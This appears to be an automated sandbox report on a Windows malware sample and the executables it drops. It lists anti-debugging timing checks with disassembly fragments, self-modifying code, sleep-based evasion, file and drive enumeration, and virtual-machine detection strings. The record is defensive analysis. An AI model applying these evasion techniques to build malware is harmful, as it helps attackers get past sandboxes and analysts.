Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71D52 second address: 4E71D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71D61 second address: 4E71D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71D65 second address: 4E71D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E71D80 second address: 4E71BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f push eax 0x00000010 call ebx 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA4C9026357h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E3096B second address: 4E30992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C908415Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E30992 second address: 4E309AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E309AF second address: 4E309B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E309B3 second address: 4E309B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E309B9 second address: 4E309CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9084161h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E309CE second address: 4E309D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E309D2 second address: 4E309E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, AF15h 0x00000010 push eax 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E105C2 second address: 4E105D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 3D28253Eh 0x00000011 mov edi, 53FD574Ah 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E105D9 second address: 4E105DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4E105DF second address: 4E105E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Special instruction interceptor: First address: 3BDC24 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Special instruction interceptor: First address: 56AB88 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Special instruction interceptor: First address: 569DBF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Special instruction interceptor: First address: 3BB5CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Special instruction interceptor: First address: 58EC1A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Special instruction interceptor: First address: 5FA601 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: 97DC24 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: B2AB88 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: B29DBF instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: 97B5CE instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: B4EC1A instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: BBA601 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: A7DC24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: C2AB88 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: C29DBF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: A7B5CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: C4EC1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: CBA601 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Code function: 0_2_04E80C47 rdtsc

0_2_04E80C47

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window / User API: threadDelayed 1095	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Window / User API: threadDelayed 1101	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1171	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1116	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 786	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1235	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1091	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 752	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 623	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 998	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1501	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 937	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 637	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-23599

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Evaded block: after key decision

graph_18-1177

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-1059

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 4300	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3552	Thread sleep count: 1095 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3552	Thread sleep time: -2191095s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3032	Thread sleep count: 173 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 3032	Thread sleep count: 236 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 1452	Thread sleep count: 229 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 4136	Thread sleep count: 1101 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe TID: 4136	Thread sleep time: -2203101s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2160	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2160	Thread sleep time: -186093s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2056	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2056	Thread sleep time: -222111s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3212	Thread sleep count: 148 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2756	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2756	Thread sleep time: -206103s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1796	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1796	Thread sleep time: -206103s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4996	Thread sleep count: 105 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4996	Thread sleep time: -210105s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3964	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3964	Thread sleep time: -162081s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3212	Thread sleep count: 1171 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3212	Thread sleep time: -118271s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7348	Thread sleep count: 1116 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7348	Thread sleep count: 786 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7348	Thread sleep time: -78600s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4268	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4268	Thread sleep time: -222111s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3364	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3364	Thread sleep time: -206103s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6908	Thread sleep count: 140 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6908	Thread sleep time: -280140s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1036	Thread sleep count: 147 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6664	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6664	Thread sleep time: -222111s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1036	Thread sleep count: 1235 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1036	Thread sleep time: -124735s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352	Thread sleep count: 1091 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352	Thread sleep count: 752 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7352	Thread sleep time: -75200s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4352	Thread sleep count: 99 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4352	Thread sleep time: -198099s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7632	Thread sleep count: 623 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7632	Thread sleep time: -1246623s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7636	Thread sleep count: 998 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7636	Thread sleep time: -1996998s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7576	Thread sleep count: 180 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7644	Thread sleep count: 1501 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7644	Thread sleep time: -3003501s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7576	Thread sleep count: 263 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7800	Thread sleep count: 246 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7660	Thread sleep count: 937 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7660	Thread sleep time: -1874937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7652	Thread sleep count: 421 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7652	Thread sleep time: -842421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7640	Thread sleep count: 637 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7640	Thread sleep time: -1274637s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_00351718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00351754h		2_2_00351718
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_00591718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00591754h		18_2_00591718

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 2_2_003529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		2_2_003529E2
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	Code function: 18_2_005929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		18_2_005929E2

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Code function: 2_2_00352B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00352B8C

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: MPGPH131.exe, 0000000B.00000002.3924069074.00000000012FD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53
Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}D
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MlpxPf.exe, 00000002.00000003.1465233712.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1570645851.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000003.1465075782.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.0000000001264000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RageMP131.exe, 00000011.00000003.1673209891.00000000016E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 00000008.00000002.3909475155.00000000003AD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}4
Source: MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&\
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925752788.0000000000CFC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},
Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B87B9D
Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1507948511.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}~
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: MPGPH131.exe, 0000000B.00000002.3926018738.00000000016AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&\|
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: MPGPH131.exe, MPGPH131.exe, 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, RageMP131.exe, 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: MPGPH131.exe, 0000000B.00000002.3926018738.00000000016AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}^
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: RageMP131.exe, 00000011.00000003.1673209891.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}{
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MlpxPf.exe, 00000012.00000003.1623765347.0000000001286000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000003.1624643108.0000000001286000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MPGPH131.exe, 00000008.00000002.3926322511.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: MlpxPf.exe, 00000002.00000002.1570645851.0000000001370000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000003.1465075782.0000000001370000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RageMP131.exe, 00000011.00000002.3926399137.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B87B9DD7
